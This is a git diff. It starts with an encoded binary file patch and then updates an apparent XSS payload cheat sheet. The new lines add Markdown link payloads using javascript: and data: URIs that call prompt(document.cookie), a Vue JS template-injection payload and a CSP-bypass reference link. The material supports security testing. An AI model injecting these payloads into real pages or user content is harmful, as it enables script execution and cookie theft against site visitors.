z@&u-eTRR7T@%(Yhz>DM@XMD}Jd0Q>Vv?wav6FPSysCwu-e3F1i89Hf2>Nq9df*y+v zTn5Om=k}?qq?)_E>(6^N_Wu$;J?sLKT`IhIC&V7) zvyRuUQ0>)}x4W0O3n4TF^L);f#!$Tui)7jI#*-MnIAx0pbMvgZ$tw;az~BSj>TfAI zCrMEO{!BfWZ+knOOTXOB2A90`EcHb*BI?wp6~$Jqmv8;p>*D3i;o(`-vc z#;js0?iJD$P$6aRhwu_ZX4Ca$Z^ z%hjV8A?^KTQ}Qn9g$2x-6e{J#GwI7{?ax|b=>Wamd;&H3^iDu0-#_hb);>jL=D6_Z z5(5XpoL6#GEXi!=+>-3aj zM?^EbpcUK8lehJ!U#{JgyctO1IP|;x+C(uh!}@#Pugui)BSx6>-?uD4{b_! z;s<1`-Xv3g`zGbVvA6EZCCt;~NJ=y5ds5f985x3~YBq0cUr_qIkMp@{HZQl{_CSUg zgXOGZ$01k;ItK8GIn(Uo+3k6&XKcLo!DDvA*&sd>eM56J5yjR;E5-9zMVYTHfn!`_QJ*>&)Vvvgv*{l6FMV$r2WU7$T3_^vCVv-0-(oBu@|Uj3 zSCg3TLRSTkr)&&7&qpsDlcq%=Ej#*$I~mu+iyc(?#$@&Scmvw3ypc2NY|_&i1J|xd z6?lb_I&|2P~@)9>w^4w0CRTb>2+U23UC|ETo-Jo}1!FCmu4TH0((7H3-A94~BB^#yjs zhME0b5$aCe6^;3I9~Xb%&G*)#i&H*K{r^bNIP*&zkYhUAbZ1 zg?WNyQ%%#W5#=nUU&Pxj-g2tD2bC)sPMWZmak~a9`9QpC;HDyr3L_6qeLb%OR&g*& z(RYS4El&qpTNOZ>>Y2FAH#n>I)_O|$V(Pj47LqT*M^AG z07V48{F`twwm*=f4oa8LJR?TjuvUTaHU+W_B-P~iyqy89$AjuV_fK~Lkl_a9?*~2m zz<2M-_P-27iHM(z0k*%=?*R+Gyx7HG#{>nc^;bcp#k{TrYS6SH)uQ&Hi?{#^Lep^Pq6$!ex8>WE4B%Z#}#3Q*AehTMzA? z`X%w~aSWkUr%iC^y~R+0QcC{qO&M`xPkjYb-4t!0>6Y(e5N5JSDMheS7l~LyRuxQO zOuIHHs@16|Gi7MWN9HUBAgc=*HqH&1rcY|-jTIUHz<^;w54S-5I)cE+y_gnuxYTnc zuN;6}jG7;Jv8s{jkC(lI23qpNi3>>0Pae0sYw&f%kPpD1v*e_&RedF=Kr&ZOz+Fws z$-obKG;AO*^!{F%J9D^&!616wbL6H)PnFJQE-DL&2if~$iX;}qvfo*m}*?xs)5_>d*v*6>tlILPtSpm z#0OoJ&H+juHDFa*&0WV{`X%1g#d}6osl`lYf@hWj!k>V<`Jf zMaG{#TN^z{r;w3dA*O_Bt0xiN7(LG7xQ9LFefA_>KG&RLw~y2cda7eph%pTunj7Fn zw3Qkrt+8w~voZbjOJK5n*@eE`QZ|&}MF3!@QSEQg)lE|EF1s5nRD1x={sLr%fC5@P z9>!QQN_q2T2k-&4M5Sh(0z{!Clg}^hFGQT z*mX37qpac5y~I0C{`jU3xBqi*k|i5G7j?kY`Bq}$xZ>f^gW0iGIl7nrvKkB6{l9i) zMM1ei8y=HI|Gj;{$pyvyE{0!DnRXhcZ2cn6QlKQ|Lh_(dK0>jx>DAI;jPm9~UGXyw zFUT7{&1izjR6Pf@2gYg~0?lAsPkG(kWz_`HA{;X2gGtH**M~sO`I}GAey6q)1rRk< zHPlU2Kk1gZ(n1af$U%!1Ys$p$g<=virJ7i*q5BWBNnwjK@CN9Zl@-9WF1Z1mSY}QX zsGiz3kn;VbM8x+N=D*wXhVfG)#fHqK#V-GOHa$)*$B=yN;>-FBCwE9D%o18-Zdp}p zSmX;wP-MefTp5q{hDCym{)<_(mEIhO0u|2v&UR53zwn$`~VTUmR$bZL$j4A6asrQtF4iUhl@sb8qB?NH&p`j_3K`+<$KU@3;DC zSXyo+dS{NGvKYUFlZUJ6!uFq>R}c*88F(dL7M`ayTMm~sA4t1#Hk@$WMB!aVR(0Qj zq(lTi?%C>n1gX*K2Jx_Pg?4ohA!1CdWHd7j-ky3XF z5~<3)S>IJXw6Bt?01lHqURLK41teg|^0N4Vz`|Is;elB;_xlhdWy334*A$43Ci9`~ z=eL$nklARUG&*F^qjMh6DHVa0xuz>BL&N=>6S}-k&`}uC35fUX2G=k1SybQGtNix` z_2Y*)amsYPLl)n?0L0$KI3O&(?%jHEWmof*4B73+%kK`VVlK&G9 zCJ#|-PCPVFN(C6_C9dH|YlZ63_|S`g;QT3i7L8`K;r|{D;7}LDt!IGzR&z8gP?>PO{Oy$JZx3Oku?E_~%Q+biBa9Y*sO zTu=t65J!;CxTd5kCKH6X`3`UwAZ;;&cX&DWM-*E;&^plHO90)}B3+Pa60_)EG9=YH zOwSZCxC~Zv%@xH@bzm0!IWHbeI#3` zr^052ty|CC&IDI@Tz4zkscbTIVzIl@VRqcbFy@A98Ri1O_O|TbvZ#N7$BB#Qm6e5k zUCpCEZoW6$+cQnNheJ$-NkL)!6$hs^cH^2uNvC|A%g1cujSrW#F3ybso?edR3T%MO zr0rLpO;OzSxI&d5BeO~x->K4Zujek34;uryopos4!FGM)3qJF z`iDGyDh+o5rq|8W@8TszbEpBO2}CT03P`8&p4?;tJkOZlr1sGxpRF!&4jC{RdXT(E z&{FV7+Q25M^LW9#;6<`>9e9|FlC!K_?XmR8$Wk$H#V+ZMfBS~^bW`f@NztrU`Dkpn z!hG=L>K(zsQ!Y>?nzqTwju>SDrRW{Xt~xtEqUiJWuCN!wdpoHN5?8{Tn%;UBm&niw zbR|lM(1j+G?u+EP7=J!~;X7hyuJ~;^=UbhG^aoYHBE{O;`xFaXX}MmjCnvDLy+^;R zyVK6qq){x?#Ea2LH{!8Y4Ne5lrzJqJS6e$@XK~TlZmYrn)-<_C9GG069lXlkh<;LR zVEMCt87PrQ$>pQjCfQlrw`Sj@I;2D!qMmg#V*?eHxs4Pk8vlUu#Ve|}dk-8MJPELKYXUWo9wyOzM?+Ns1P>#p9@t33GL9L;!vKAhVt z96R_b1TS0gn3c5={YAUO@B3;v>ljoM9I7~V-_s^ys(=~{y_TE$b-aP94n}G*PK2?+V-{inccc5!WVOqPf8USR|!lRXrCruNEJnWOGcYJ0F+BceJlTQ zTj;m>TNm@^yMQbKhe*GWWdmo=TgNNLOBS!=`(GJ`9cAL+C+*F~RDLW{i&l_^P+0$Y2O$S*)WlE4cS9xG}@_fM8YJ9Gd`E;K}W7`f=pQ1~InuR%$a$MNIheA1+LArjHOshb63!$841q!fv=!Q)Q089 zlq!s1GfK|k@@q9toJPdQR9eOYD%+utx!Gqxe39vIFGItBVWPEjo0;motO`T8&D-As z5Fyj_(uK>B;$>2lgA3h1%K80P?5Td()Xbd{5#!1;@xjZyfh)oQ$=uf$^xzU*zx`;Q zmf=>&>PL}^>89}#VTD=h-xclDdsr7#@g;WavygF_Y3QBypk?0S6K8XZ%g(g{eH@2) zc)-OUjb?#(P99Py+BVnG(m4Tui^DoACD<88xKza9H+FnkUF+6eh11Z$BUgo81ME!j zqQ1!`S+`%Ct*i_v$HjAQ!41=>Z95^Ld@Gv$VMa5hn>>=f<`OXpOB{*O1dt0fXlqiZAb>HADYMe_bNe0mM0)|5!8f z9O7CHS&NIWG39q3d}i(O-RJ9;%3x`^_T)llu3e|c+{?p<3;r@{P}aCb{FNIy+J{Bu z4n(c|QF!=rKFuDtcTak#8r3GHA?=!Xtd|HsNVmUj0BdiomOo~#RoLe>J$a0ImKIqs8@=lijTHjb_Vq>qnk@`ve z6j;Tpj0%8T)1+Ln9AZ8#OJ7!0>*-WqTbKP(i}=l%I8g(NlL>d{c1Tz=QWf07Gg{(G zRC5`WL(Jx<8c3O&yQIYK`2{W^L29pZU7liWg9=tMtNlI(g?@R3q)Ko5A>^|>TvgBNoOOZ9weJiuW1zf+_(HfMgXs;WK(gIo{hu{rxKr6qdo z^7Xi8!j;M(!#Wj=0}g6;t7EgV)j@*VL1Z$jsDC%HyV1S3vfdF zQWM^hBzxv6B@cplfV(ROJilR|W|9n9NY>}T#x@qmn*LAiRNf=s?T zg~CGjG6e`g!jbt6=*onDK$p<%d7s(nrPJbxM^q4jso=-7*`Ew&uJ^C}G>zddmd752 zkh>uw?T?0i*6LC%_I7OB)ipkO(ArL>r3G!%czt15pWMVmJq(s?S-;CH?lLp#b#fRm z+3EIpv6qJRpetiM-IVzFF^Y|eN0t|y!7PD8q$lfo49ve2&5my!yOF(m=eW5mWugTW zwG~4!fwBc=i&hSTZFOhNT^Yp_(i>cDXjgb?^ zP`mLOlkMgDRzS8WH@CY`T~fi-7q09Y9aVuP?^`-&UYgK9}O4z=YzyQF?k-{mavt08V4FH5cb$@m~xb)8nv^E}~X z^=GS_s>{P*P%dt6!&c?)ixC5=D8w~|t9@Gr%c@(h`RFuB#4xm3U+fhEGMe6Z)_rxh58*%H@pprrY5PDyFZ3T zQYWoZcKJPl?5 zKt|xt;K|r=uT)OxC%KfHq}aB14gd$kEW!UVkxtph5^?r7C>~!= z6`=%FzX@vkM+K>tQ7wFb%`ooa6V|?LS2hv&DQW3I6fG0+Y1*4=Et|(gaJV=_jAf!J z2v5RQevueD*$glY8cq?$oL|nZla~c-5VD54zTWwoC;m@A?lp{0R@RwmUpOQ4a&Ind z;`+H05{fqk9X3imN2)63dH(%M>ec;KCus5I7y@}5!21ZeOinnE!6T}ETbhV(8s3?< zt!V2z21Akc=y9y!93XYBc}L%cF!_2DtaY{73ljudzT1g=sW1ckpS_=x-2jt9Ypifl z{;}4J{gNE)7Fwu1c9aQ4Jo65Qk{apjDqjN@nRL?Fz0c3g<*zjB&|+x6UHptl!=Re1 zG060FSv{ssS`5N{Q!gDP^iYXbCFA$H?)GEa6mE8AE?z)?FaoKm?$pUtWHC+rOK6cwo1K4v-1QA?nTtZ)HG(!i{}`)| z9G_UwlaH6DlvR|Ih!guE0J=}`ZesFka3y5XwN6hiJ0Mn?JQ1J*)5zb-1iSOnGz?0w z+StM=1Pmck`GPJb(p$>cOOpqs#bJt+UVTCWw{S3ehIULF68?E=>lp5S^z`SBr2rORHO!wn{@0)=!A zBIDyC;f&D+V3G|ALOj6?g!OUkhWsp|?NmQ1B2tY*e)AaP|6m#i-OG{M?}U*^5vhTG z*^u*T8S<^o@7k(i5;vsG`IZJ`v3strKn?y94Dg|NU)Y9?{OV$7MKY)Z$Z8%31bPay zNFj@?zE15`0_yxCMl$iRFg2F8a{@Sa4WxlS z5(CIgc+++UD-9DzD37g!EFje3gCajdWX#McyVIo&`kU47zZx~(SXKj}`c+jEsH5fKorW0@XHxnTn%sCRu%_FtZs5;X&h3rqxmu7d zpFpFOh1UW7bM|Po#)@_*@_fGBfIKjn(J_EKww3fOWo-%8B=vhIhK4>XlHL7!{lSUW zQTE}3SE>6OA(h9Tb>X&Wd{p%ywT2R-FvUe>MnsmOAIv~BqB)qjK&aP`dMpRF@O5m^6NwEy+P|M%7Z`_a5{=ie6Cy$Q?a^Mrf-!x>Sh zv!ey^otjVCE@?iUm_6Z$abWlB*V5zcN?oZ2QlW|p|sMBRa;))xh) zvM?oo`Ej@nX+M93-c7=>E?0F{S3R<%`AApqpr!)S9pZx&@0W z96JsroiLb5HE-ajcU6pyqkzqd%i;<=unb({w5VrZUDe>%%Fz{|m}+PT+(Spmq{0?S zd2l|!Cfidy4uF1u69uTucD>c6zcPCGTQZ*#sw};X;T18Psd2R?C!J3{{c<-TnYdH literal 0 HcmV?d00001 diff --git a/XSS injection/README.md b/XSS injection/README.md index 4c6edb0..06f14fd 100644 --- a/XSS injection/README.md +++ b/XSS injection/README.md @@ -6,7 +6,7 @@ Cross-site scripting (XSS) is a type of computer security vulnerability typicall - [Identify an XSS endpoint](#identify-an-xss-endpoint) - [XSS in HTML/Applications](#xss-in-htmlapplications) - [XSS in wrappers javascript and data URI](#xss-in-wrappers-javascript-and-data-uri) -- [XSS in files](#xss-in-files) +- [XSS in files (XML/SVG/CSS/Flash/Markdown)](#xss-in-files) - [Polyglot XSS](#polyglot-xss) - [Filter Bypass and Exotic payloads](#filter-bypass-and-exotic-payloads) - [CSP Bypas](#csp-bypass) @@ -233,6 +233,15 @@ XSS in SVG (short) </title><script>alert(3)</script> ``` +XSS in Markdown + +```csharp +[a](javascript:prompt(document.cookie)) +[a](j a v a s c r i p t:prompt(document.cookie)) +[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K) +[a](javascript:window.onerror=alert;throw%201) +``` + XSS in SWF flash application ```powershell @@ -693,6 +702,8 @@ Exotic payloads ## CSP Bypass +Check the CSP on [https://csp-evaluator.withgoogle.com](https://csp-evaluator.withgoogle.com) and the post : [How to use Google’s CSP Evaluator to bypass CSP](https://blog.thomasorlita.cz/vulns/google-csp-evaluator/) + ### Bypass CSP using JSONP from Google (Trick by [@apfeifer27](https://twitter.com/apfeifer27)) //google.com/complete/search?client=chrome&jsonp=alert(1); diff --git a/XSS injection/XSS in Angular.md b/XSS injection/XSS in Angular.md index c627659..89d7376 100644 --- a/XSS injection/XSS in Angular.md +++ b/XSS injection/XSS in Angular.md @@ -132,3 +132,9 @@ Angular 1.0.1 - 1.1.5 ```javascript {{constructor.constructor('alert(1)')()}} ``` + +Vue JS + +```javascript +{{constructor.constructor('alert(1)')()}} +``` \ No newline at end of file